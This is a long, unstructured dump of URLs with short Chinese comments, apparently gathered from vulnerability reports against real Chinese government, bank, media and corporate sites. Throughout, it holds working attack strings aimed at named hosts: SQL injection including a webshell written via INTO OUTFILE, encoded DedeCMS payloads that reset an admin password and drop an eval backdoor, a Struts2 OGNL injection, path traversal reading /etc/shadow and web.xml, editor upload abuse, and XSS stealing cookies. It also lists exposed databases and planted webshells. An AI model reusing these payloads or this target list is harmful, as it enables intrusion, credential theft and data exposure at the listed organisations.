http://i.yinyuetai.com/wb/post/doDelete.action?id=16462080 http://i.yinyuetai.com/1988428/feed/detail?id=16462080 http://city.china.com.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php http://www.xzhuang.com:80/?ucenter-info.html www.xzhuang.com rv:21.0 http://www.xzhuang.com/?member.html http://show.yule.sohu.com/viewUser.action?id=27 https://210.45.240.11/manage/ inurl:LoginPage.do?userType http://61.187.87.49/pms-hn/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector 
http://kjjh.lninfo.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://vote.stcn.com/yuqing/result.jsp?sid=5470&pid=120 http://dty.stcn.com/generalSubject.do?method=load_middle&tid=1489 http://mojie.sjq.cn/index.php?app=home&mod=Help&act=thread&id=62 http://pay.sjq.cn/admin http://subscribe.marieclairechina.com/websubscribe/mc_info.aspx?code=MC259&option=A http://cp.china-bluestar.com/transport/lxtransportapp!save.action http://www.158pe.com/admin.action http://www.tingmeineiyi.com.cn/Database/Data.asa http://www.tingmei.com/Database/Data.asa http://969966.net/sztw/shop/index.htm http://969966.net/sztw/shop/navigation!enterBusList.action?sign=bank&area=&bigType=%E9%87%91%E8%9E%8D%E6%9C%8D%E5%8A%A1&smallType=&keyword=&pager.pageNumber=9&pager.pageSize=50&pager.orderBy=id&pager.order=desc http://mail.qiyi.com/iwc_static/layout/login.html http://mail.qiyi.com/iwc_static/layout#login.html http://www.zgssxw.net/admin_manager/Admin_Managemain.asp http://www.zgssxw.net/databases/ http://www.zgssxw.net/images/ http://www.zgssxw.net/databases/ http://www.zgssxw.net/admin_manager/ http://www.zgssxw.net/image/ http://www.zgssxw.net/inc/ http://www.zgssxw.net/city/ http://www.zgssxw.net/css/ http://www.zgssxw.net/flash/ http://www.zgssxw.net/js/ http://www.zgssxw.net/jl/ http://www.zgssxw.net/jsq/ http://www.zgssxw.net/swf/ http://lifeweek.com.cn/iRelease/jsp/other/RegionView1.jsp?rid=1&issueid=624 http://v.huatu.com/htnews使用的是dedecms 
http://v.huatu.com/htnews/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35 http://www.ubsclub.com/DFN/member/Disclaimer!Save.action http://113.5.255.119:3380/inms_3.0/login.do http://wms.vipshop.com:8181/WebUI/UserLogin.aspx?i=1 http://www.sxkyzq.com/ http://183.60.7.30/system/gotoLogin.action http://183.60.7.30/manage/system.jsp?o=vLogin http://bug.9158.com/ http://bug.9158.com/web.rar很蛋疼的是源码直接就在根目录。。你在逗我吧。 http://www.ego-photo.com/show.php?id=5081 http://www.51ipa.com//plus/search.php?keyword=as&typeArr[111%3D@`\ http://3g.iqiyi.com/wap/pro/forward.jsp?forward_url=http://www.baidu.com跳转 http://3g.iqiyi.com//wap/pro/forward.jsp?c=&dirid=index&forward_url=..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2fetc%2fpasswd&linkid=285读取etc/passwd http://10.10.131.126:8087/wap/cms/index.jsp https://scm.qiyi.domain:18080/svn/mobilerep/server/wapsupport/212_wap/clien http://3g.iqiyi.com//wap/cache_admin.jsp?a=3&k=sbhelen http://3g.iqiyi.com/wap/pro/fdetail.jsp?c= http://3g.iqiyi.com/wap/cms/vte/vte.inc 
http://i.yinyuetai.com/wb/post/doPost.action http://vip.yupage.com/yyt.htm VERSION:1.2.2 www.dcel.nwpu.edu.cn www.lib.nwpu.edu.cn www.mba.nwpu.edu.cn www.nwpu.edu.cn www.dcel.nwpu.edu.cn www.lib.nwpu.edu.cn www.mba.nwpu.edu.cn www.nwpu.edu.cn http://218.21.78.40:7000/ http://218.21.78.40:7000/Foundation/easyUI/TabStrip/ShowTabStrip.aspx?TabKey=b02053ba-96ac-44cd-bcb1-6d4a2d4b6919&SkinPath=/Foundation/easyWork/Config/TabStrip.ascx http://218.21.78.40:7000/Foundation/easyUI/TabStrip/ShowTabStrip.aspx?TabKey=8d966efa-15c6-44bd-af3d-357c7e121eda&BusinessTreeId=A1000000-0000-0000-0000-000000000000&SkinPath=/Foundation/easyWork/Config/TabStrip1.ascx http://218.21.78.40:7000/foundation/easyinfo/treeFrame.aspx?TreeKey=CCF49EBC-81A5-4945-B8C0-D3961EC3FFB0 http://218.21.78.40:7000/Foundation/easyWork/Config/AuthorityConfig.aspx http://218.21.78.40:7000/Foundation/easyWork/showwork.aspx http://www.ainol.com/plugin.php?identifier=ainol&module=article&action=info&articleid=621’ http://mall.uc.cn:8020/login.php http://mall.uc.cn:8020/fckeditor/editor/filemanager/connectors/php/upload.php http://mall.uc.cn:8020/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media&CurrentFolder=%2F http://www.ellechina.com/esa2011/interact_player.php?id=47+and+1=2+union+select+1,user(),3,4,5,6,7&type=4 http://subscribe.ellechina.com/websubscribe/deco_info_new.aspx?code=ED203’ http://www.weimeizi.com/topic.php?channelID=6&topicID=12 http://cw-info.shenzhenair.com/QMYS/Web/index.aspx http://cw-info.shenzhenair.com/QMYS/Web/UploadFile/YSFJ/2013/06/2013060809201***.aspx http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971032 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971031 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971010 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971030 http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971019 
http://www.998.com/Reservations/ViewOrderInfo.aspx?CRSResvNo=130608120971014 http://www.1008612580.com:9000 boss1.sports.sohu.com/other/ftx/.svn/entries svn://10.11.5.91:2121/BBBoss/webroot/other/ftx svn://10.11.5.91:2121 http://old.cuba.com.cn/cubadata/gamelist.php?seasonid=14 http://old.cuba.com.cn/cubadata/gamelist.php?seasonid=14 http://old.cuba.com.cn/cubadata/gamelist.php?seasonid=14 http://www.tianjingas.com/tjsinfo/index/index.action http://www.998.com/campus/rember.aspx http://www.xtqxj.com/zh.asp?id=289 http://web.10050.net/Admin/Upload.asp http://www.huihongled.com/ http://www.bjmglz.com(自助设备生产商,跳沙盒环境大多都是拿这种自助设备下手的,在信息系统中也泄漏了这些设备订单的相关数据配置) http://www.hallsia.com/ http://www.intehel.cn(这两个都是恒鑫亚的网站) http://www.xxx.com/reportFiles/cj/cj_zwcjd.jsp http://www.newwinner.cn/MailUI/MailContent.aspx?mailId=174870&mailStatusId=2745084&height=450&width=600&TB_iframe=true http://www.newwinner.cn/MailUI/MailContent.aspx?mailId=174355&mailStatusId=2745084&height=450&width=600&TB_iframe=true http://baoliao.10yan.com/admin/commentnum1.asp?id=2913 http://www.aiyonet.com/user/UManage/bankrec.asp http://www.aiyonet.com/user/UManage/bankrec.asp http://www.aiyonet.com/user/left.asp http://www.aiyonet.com/user/left.asp后,左下角会出现一个转到admin管理。点就可以转到管理员了 http://www.l99.com/view.action?postId=2370967 http://www.google.com.hk/search?q=KJ021320+JSP+Manage-System http://e-learning.cnpc.com.cn/jsp/index3.jsp http://122.226.206.134/download/a/商务.zip http://t.sohu.com/mailBox/deleteAllMail http://t.sohu.com/noticeBox/deleteAllNotice http://t.sohu.com/settings/bindMobile/sendVerificationCode?mobileNumber=15066666666 http://pushemail.10086.cn/e/dynpage/get/content.php?id=1210&mobile=15120016119&resolution=320*480 http://cms.300.cn/cms/jsp/login/login.jsp http://ncc.cma.gov.cn/Website/index.php?ChannelID=1 http://invest.china.com.cn http://invest.china.com.cn/wwwroot/Log/W3SVC602851844/ex130601.log http://invest.china.com.cn/wwwroot/Log/W3SVC602851844/ex130602.log 
http://invest.china.com.cn/wwwroot/Log/W3SVC602851844/ex130603.log http://invest.china.com.cn/AddNews.aspx?operator=Insert&channelID=000000010003&channelName=%u7535%u5b50%u5546%u52a1 http://invest.china.com.cn/admin/Login_zk.aspx http://www.pci-china.com/ http://www.orsc.org.cn/ http://ting.sohu.com/send/sending_setcookie.php?cpcode=asdf http://ting.sohu.com/send/balance_user.php?userid_comm=d'%20and%20t1.user_id=t2.user_id%20%20%20union%20all%20select%20%22xxddoo%22,2,3%20INTO%20OUTFILE%20%22/mfs/wwwroot/ting/send/nixuehan.html%22--%20 http://www.cmdi.gov.cn/ http://www.cmdi.gov.cn:5555"可遍历目录,找到些有用的东西; http://www.cmdi.gov.cn:5555/YLQX/fxgc_czcp.asp; https://i.yeepay.com/fangzheng/creditcard/creditcard_new_prepareinput.action http://eoss.300.cn/system/login.do http://sms.tom.com/index.php http://f.game.tom.com/movie/onunload.php?serverid=1%20AND%20%28SELECT%208515%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a7073683a,%28SELECT%20%28CASE%20WHEN%20%288515=8515%29%20THEN%201%20ELSE%200%20END%29%29,0x3a7362653a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 http://www.xzwater.gov.cn/hwzwgk/main/action/main!login.action http://contact.audi.cn/m/dealer/msizes!seljxs.action jar:/usr/local/tomcat/bin/commons-logging-api.jar server:/usr/java/jdk1.5.0_16/jre/lib/i386:/usr/java/jdk1.5.0_16/jre/../lib/i386 http://java.sun.com/ jdbc:oracle:thin:@10.172.12.42:1521:a jdbc:oracle:thin:@10.172.12.42:1521:a http://java.sun.com/ http://java.sun.com/cgi-bin/bugreport http://ac.51job.com/phpAD.tar.gz http://www.zltfda.gov.cn/login.asp http://sdn.kugou.com/link.aspx?id=3480&url=http://51yyzl.com/comeon http://my.phpstat.net/update.php http://my.phpstat.net/export.php http://ahndskxb.ahau.edu.cn/wwwroot.zip http://admin.300.cn/ewebeditor/admin/login.php http://www.zzsf.gov.cn/news/admin/index.asp 
http://www.zzgqt.gov.cn/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563% http://www.zzkpw.com/pass.asp http://www.zzkpw.com/manage/ http://www.zzsnw.gov.cn/admin/ http://www.zzsnw.gov.cn/admin/upfile/fileManage.asp?folder=../admin/ http://www.zzgp.gov.cn/admin/ http://www.zzgp.gov.cn/admin/upfile/fileManage.asp?folder=../admin/ http://www.zzjxw.gov.cn/admin/default.asp http://www.zzjxw.gov.cn/admin/upfile/fileManage.asp?folder=../admin/ http://www.skdzz.com/admin/admin_main.asp http://www.skdzz.com/admin/upfile/fileManage.asp?folder=../admin/ http://218.56.153.66/admin/upfile/fileManage.asp?folder=../ http://www.zzws.com/admin/upfile/fileManage.asp?folder=../ http://www.zzwgx.gov.cn/wgx/admin/upfile/fileManage.asp?folder=../ http://www.zzfs.org/admin/gg/a.asp;2.js www.sdzzcz.gov.cn http://www.sdzzcz.gov.cn/admin/ http://www.sdzzcz.gov.cn/db/%23fgfdszfasad%23.mdb http://www.sdzzcz.gov.cn/admin/upfile/fileManage.asp?folder=../admin http://www.sdzzcz.gov.cn/upload/news/201341922244.asp http://www.zztjj.gov.cn/User/index.asp http://www.zzsjtj.gov.cn/UserFiles/File/vshell.jsp http://qipai.pipi.cn/center.html http://yks.nsa.gov.cn/readnews.asp?id=1121 padding-left:5px display:inline vertical-align:bottom http://smscom.12321.cn:8080/temuser8080/login.jsp http://baoliao.qcyn.sina.com.cn/report/report/?m=report&act=report&time=1 http://222.91.161.254:8020/login/navigation.action http://222.90.206.18:8000/MCreditYlgl/ApproveWeb/Web/RegEntUser.aspx http://www.audiclub.cn/uploadHeadImg/uploadimage.jsp?Picurl=pic2000844.jpg%22%3EXSS%20here&step=2 http://www.audiclub.cn/circle!create.action http://www.ickey.cn/tools.php?action=dlt&type=-1 http://open.letv.com/third/ad/ad_setting.php?c=120154&id=70&p=70 http://www.hbcgr.com/ http://www.jghq.gov.cn/UploadFile/20100824022804575.jsp http://nba.hupu.com/manage/book.php http://nba.hupu.com/manage/menu.php http://nba.hupu.com/manage/url.php 
http://nba.hupu.com/manage/comment.php http://nba.hupu.com/news/admin/apply.php ftp://zztj.gov.cn/ http://www.998.com/News/NewsListAll.aspx?kinds=1&newskind=1&key= http://202.108.35.149/tongji/ http://font.xiaa.net,苦逼的前端设计人员可能会用到这玩意儿,字体管家的字体预览处有XSS漏洞,具体为: http://font.xiaa.net/exe/look.php?str=aaa&size=20&lang=cn http://font.xiaa.net/zip/cn/1.zip',1,this http://font.xiaa.net/exe/look.php?str= http://lno.pw/test_4141.js http://lno.pw/test_4141.js http://123.125.105.76/ http://60.28.244.181/ http://60.28.244.156 http://210.17.38.180/ http://115.239.133.251:6090/imweb/toSouGou/index.html VERSION:1.2.2 www.cnooc.com.cn Version:9.3.6-P1 www.cnooc.com.cn Version:9.3.6-P1 VERSION:1.2.2 www.cbrc.gov.cn www.cbrc.gov.cn www.cbrc.gov.cn http://zone.pptv.com/vmei/xs?team=yellow http://www.oppo.com/index.php?q=software/list&type=3&t=ASC http://www.oppo.com/index.php?q=software/list&type=3&t= http://www.21578.com/Web/index/noticeshow.aspx?noid=26 VERSION:1.2.2 www.mod.gov.cn http://www.hgbookvip.com:8000/editor/filemanager/browser/default/connectors/test.html# http://www.qzdatasoft.com:8088/qznjw/ewebeditor/admin/ http://www.iscompetition.net/jsp/index/downFile.jsp?filename=/../../../../../../etc/passwd http://games.kugou.com/ServiceAdmin/ClientQuestion/Results.aspx?recordcount=211269&page=1 http://yangfanbook.sina.com.cn http://admin.activity.91.com/ http://en.admin.activity.91.com/ http://www.ln.sgcc.com.cn/login/CmsSubmit.do com.tencent.minihd.qq/databases/文件夹下,将相应QQ号码的数据库拷贝出来,例如1234567.db,接着在电脑上用SQLiteSpy软件打开这个文件,friends表的内容是好友信息,mr_friend_******里的内容是与******好友的聊天记录,都是明文存放,方便查看。 http://www.hasmx.hrss.gov.cn//FckEditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=/a.asp&NewFolderName=z&uuid=1369647267562 http://202.108.37.189/tongji/ http://www.sdosta.org.cn/web15/usersys/login.action http://df.ycga.gov.cn/copy.php http://df.ycga.gov.cn/admin.php http://df.ycga.gov.cn/manager.php http://df.ycga.gov.cn/admin/ 
http://df.ycga.gov.cn/administrator/ http://bj.bbs.house.sina.com.cn/bbs/post/show/?pid=5749808347977109478&retcode=0测试帖 http://www.96877.sh.cn/admin/login.htm http://www.96877.sh.cn/admin/admtianxuan168in_admin_ok.asp?id=4 http://180.153.132.4/SqlLog.txt http://www.yonyou.com.hk/new/enquiry.php?uid=1 http://www.yonyou.com.hk/story/index.php?id=XSSCODE http://www.yonyou.com.hk/new/admin/ http://blog.sina.com.cn/s/blog_aec37ed20101b0j3.html http://fn-sso.ceair.com:7010/sso/sso-login.do nlogin:cnhhuan+用户名 http://www.cnpat.com.cn/ http://www.cnpat.com.cn/login.aspx http://www.cnpat.com.cn/shangchuan/ http://mi.qianlong.com/admin/ http://subject.yonyou.com/20130315.rar http://www.yonyou.com.hk/new/content.php?uid= http://yts.yonyou.com/NewsAction_cyyj.do?title= http://tobacco.yonyou.com/admin/index.jsp http://www.yonyou.com.hk/new/admin/index.php http://myerp.yonyou.com/admin/login.aspx http://audit.yonyou.com/admin/login.php http://bs.hnds.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://bs.hnds.gov.cn/UserFiles/File/中, http://plus.aili.com/vote/vote_end.php?vid=31 http://plus.aili.com/vote/vote_end.php?vid=31%20UNION%20ALL%20SELECT%20username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20admin%20-- http://help.cnki.net/Live800_1_2.aspx?GroupID=502&PageID=101007&Name=&CookieName=TTKN_OnLine_800 http://www.mangocity.com/TB2BWeb/jsp/ordermanage/clientOrderSettlement_queryOrder.action http://www.mangocity.com/TB2BWeb/jsp/sysmanage/searchContent_saveOrUpdate.action http://wooyun.org http://wooyun.org http://127.0.0.1/phpwind/src/extensions/getshell/php.php http://sales.263.net/ http://sales.263.net/clientManager/ http://xzfw.wuhai.gov.cn/1.jsp http://www.oppo.com/index.php?q=software/list&type=3&&d=ASC http://www.oppo.com/index.php?q=software/list&type=3&&d= http://www.oppo.com/index.php?q=software/list&type=3&&d=and%200%3C%3E(select%20count(*)%20from%20admin) 
http://www.oppo.com/index.php?q=software/list&type=3&&d=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://theme.oppo.com/?q=index/theme&theme_id=31322%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://account.oppo.com/sysadmin/htm/?q=user/register&back=http%3A%2F%2Ftheme.oppo.com%2F%3Fq%3Dindex%2Ftheme%26theme_id%3D31322%2522%2F%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E http://www.yonyou.com.hk/admin/index.php http://www.hwexpo.com北京海闻展览有限公司存在SQL盲注漏洞,包括其制作的12个展览会网站。后台密码相对简单。 http://www.hwexpo.com/index.asp?tid=523 http://www.hw expo.com/index.asp?tid=523 http://www.hwexpo.com/admin/ http://www.laipin.com/ http://www.laipin.com/shop/goods!keySearch.action http://www.laipin.com/shop/goods!keySearch.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d) http://it365.yesky.com/ http://61.178.185.67:85/UpLoadFile.jsp http://61.178.185.67:88 http://61.178.185.67 http://www.csi.ac.cn http://www.csi.ac.cn/manage/content/docmanage/download.jsp?filePath=/../../../../etc/shadow http://www.seis.ac.cn http://www.seis.ac.cn/manage/content/docmanage/download.jsp?filePath=/ycszsxx/../../../../../etc/shadow http://www.eq-hl.com http://www.eq-hl.com/manage/content/docmanage/download.jsp?filePath=/rsc/../../../../../etc/shadow http://www.eq-xj.gov.cn http://www.eq-xj.gov.cn/manage/content/docmanage/download.jsp?filePath=/rsjy/2013/../../../../../../etc/shadow http://www.eqyn.com http://www.eqyn.com/manage/content/docmanage/download.jsp?filePath=/zhfy/../../../../../etc/shadow http://www.nx.earthquake.cn http://www.nx.earthquake.cn/manage/content/docmanage/download.jsp?filePath=/files/../../../../../etc/shadow http://www.eqsd.gov.cn http://www.eqsd.gov.cn/manage/content/docmanage/download.jsp?filePath=/../../../../etc/shadow 
http://lifestyle.rayli.com.cn/comment/saysth.php?id=1 http://lifestyle.rayli.com.cn/inseasonnow/userdish.php?id=1 http://lifestyle.rayli.com.cn/comment/topic.php?cid=1 http://lifestyle.rayli.com.cn/comment/channeldetailcount.php?channel=1&did=1 http://www.oppo.com/?q=search&search=%20%22%2F%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%20 http://www.oppo.com/?q=search&search= http://itlianghui.ccw.com.cn/2007/upload.php http://xtep.ellll.com/index.action http://open.189.cn/discuz/plugin.php?id=question2answer http://www.hubeibank.cn http://www.hubeibank.cn/download/download.jsp?filepath=/uploadfiles/yhjj/zygg/../../../../WEB-INF/web.xml&filename=web.xml http://ebank.pzhccb.com http://ebank.pzhccb.com/download/download.jsp?filepath=/site323/uploadfiles/gncj/../../../../WEB-INF/web.xml&filename=web.xml http://www.bankoffs.com.cn http://www.bankoffs.com.cn/download/download.jsp?filepath=/uploadfiles/syqt/ggl/../../../../WEB-INF/web.xml&filename=web.xml http://www.bankhs.com.cn http://www.bankhs.com.cn/download/download.jsp?filepath=/uploadfiles/ggfb/../../../WEB-INF/web.xml&filename=web.xml http://www.bankofhld.com http://www.bankofhld.com/download/download.jsp?filepath=/uploadfiles/fwgg/../../../WEB-INF/web.xml&filename=web.xml http://www.bankofxinxiang.net http://www.bankofxinxiang.net/download/download.jsp?filepath=/uploadfiles/helpqy/../../../WEB-INF/web.xml&filename=web.xml http://www.xtbank.com http://www.xtbank.com/download/download.jsp?filepath=/site902/uploadfiles/rczp/../../../../WEB-INF/web.xml&filename=web.xml http://chengdebank.com http://chengdebank.com/download/download.jsp?filepath=filepath=/uploadfiles/helpqy/../../../../download/download.jsp&filename=download.jsp http://so.haodf.com/all.php?fromcode=***&type=***&q= http://search.haodf.com/all.php?fromcode=***&type=***&q= URL:http://so.haodf.com/all.php?fromcode=utf-8&type=all&q= http://so.haodf.com/all.php?fromcode=utf-8&type=all&q=exp*或者http://search.haodf.com/all.php www.baidu.com 
URL1:http://search.haodf.com/all.php?orderby=1&q= www.baidu.com URL2:http://search.haodf.com/all.php?orderby=1&q= www.baidu.com http://caipiao.online.sh.cn/index.action http://qqmail.xinnet.com http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://qqmail.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector提交 http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://qqmail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://sinamail.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://api.xinnet.com/Modules/common/components/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=../../../../../../../../FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://shtec.esf.soufun.com/Sign/UploadNext.aspx http://wq.tom.com/plus/moon.php 
http://www.189fy.com//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.189fy.com/plus/mytag_js.php?aid=9013 http://www.189fy.com/plus/90sec.php 
http://vrm.lafaso.com/vendor/index!exitQueryCount.action?vexchangeId=75556 http://game.96963.com/game_ct.php?id=239 http://fsb.guosen.com.cn/wlxt/KCManage/KC_info_hh.aspx http://fsb.guosen.com.cn/wlxt/CGmanage/CGD_manage.aspx http://show.ellechina.com/2201638/ http://show.ellechina.com/2201638/ ztadmin.house365.com/admin.php http://3g.96963.com/news_ct.php?id=258 http://jsfile.duapp.com/timer.js http://jsfile.duapp.com/timer.js后,换eval为prompt解密如下: http://jsfile.duapp.com/payload.js http://tieba.baidu.com/f/commit/thread/add http://tieba.baidu.com/p/ http://www.czjt.gov.cn/ http://www.czjt.gov.cn:8090/publicfiles/business/htmlfiles/czsjtj/ashipin/1307990171328/455.jsp?sort=1&dir=C%3A%5C http://sns.3g.ifeng.com/v1/pim2.jsp?sid=ifeng:8338:26248!1371019278256&pt=1:53456 ifeng:8338:26248!1371019278256&pt=1:53456这个应该是这个号的id http://tieba.baidu.com/p/2390579271 http://jsfile.duapp.com/ http://tieba.baidu.com/f?ie=utf-8&kw=%E7%AD%B1%E9%A3%8E%E6%9C%89%E6%84%8F http://elearning.100e.com/lvword/ApplyAdd.asp http://elearning.100e.com/lvword/ApplyDel.asp http://elearning.100e.com/lvword/ApplyDel_NoCloseWinDow.asp http://en.100e.com/buy/chklgn.asp http://en.100e.com/global/chklgn.asp http://en.100e.com/buy/VerifyName.asp?MemberName=1 http://www.ytnst.cn/ http://ytnst.cn/ytsp/admin.asp http://ytnst.cn/ytsp/ytzcjytsp.mdb http://sso.jinku.com/login/login.action https://sfapitest.baidu.com/wgsandbox/apitestPage.action encap:Ethernet F2:E9:08:8C:7B addr:10.52.143.58 Bcast:10.52.143.255 Mask:255.255.255.0 MTU:1500 packets:3999977533 dropped:40130 overruns:40130 packets:4414261032 txqueuelen:1000 http://show.aili.com/index.php?m=content&c=goods&a=myhome&uid=850085 http://show.aili.com/phpsso_server/api.php?op=uc http://www.xinnet.com/Modules/agent/domain/domain-dns.jsp http://www.ehome365.cn/yijia/booking.asp?ID=1 http://gtzl.mlr.gov.cn/nsdg/dgwFrontWeb/dgwFrontWeb_index.action?selectServernodeId=4 http://www.chinabenet.com http://my.58.com/deleteinfo/?infoid=14219463211911 
http://www.xx.com/content.aspx?lb=dl http://www.xx.com/content.aspx?lb=dl http://www.xx.com/content.aspx?lb=dl http://www.yinei.com/ http://www.telecom10000.com/new_3.asp?id=52 http://www.larcw.com/comInfo.php?id=5607 http://www.wuyouonline.com/business.php?id=3 http://www.znzcn.com/tongxinzhishi_c.php?id=82 http://www.shlongtian.com/solutionshow.php?id=11 http://www.cmzdrc.com/job_show.php?id=745 http://www.ysten.com/traseedetail.php?id=128 http://city.cd.qq.com/app/?type=1001&mod=api&act=friendsAdd&of=js&name= http://www.soidc.com/idc-detaile.php?id=1 http://tmxk.org/book/%E5%AF%86%E7%A0%81.mp4 http://117.27.135.200:8080/FjOpenEpp/login.action http://www.u5.cn/login.action http://live.xiaoi.com http://live.xiaoi.com/plus/mybak.php http://v.iiyi.com/admin http://rw.baidu.com/User/info http://tms1.zte.com.cn/WorkCost/HumanCost/UI/FillMyWorkHourOut.aspx?span=1 http://xiazaiadmin.dichan.com/winmanzone/ http://www.channelping.net//expenseTeacherAction.action http://app.baidu.com/app/enter?appid=103488 http://www.sjzszlxx.com www.sjzszlxx.com DAV:sql http://tools.52pk.com:8088/Manager/Update/ToolWeb_Update_Mes.aspx?ToolId=1 http://mall.uc.cn:8020/fckeditor/editor/filemanager/connectors/php/upload.php 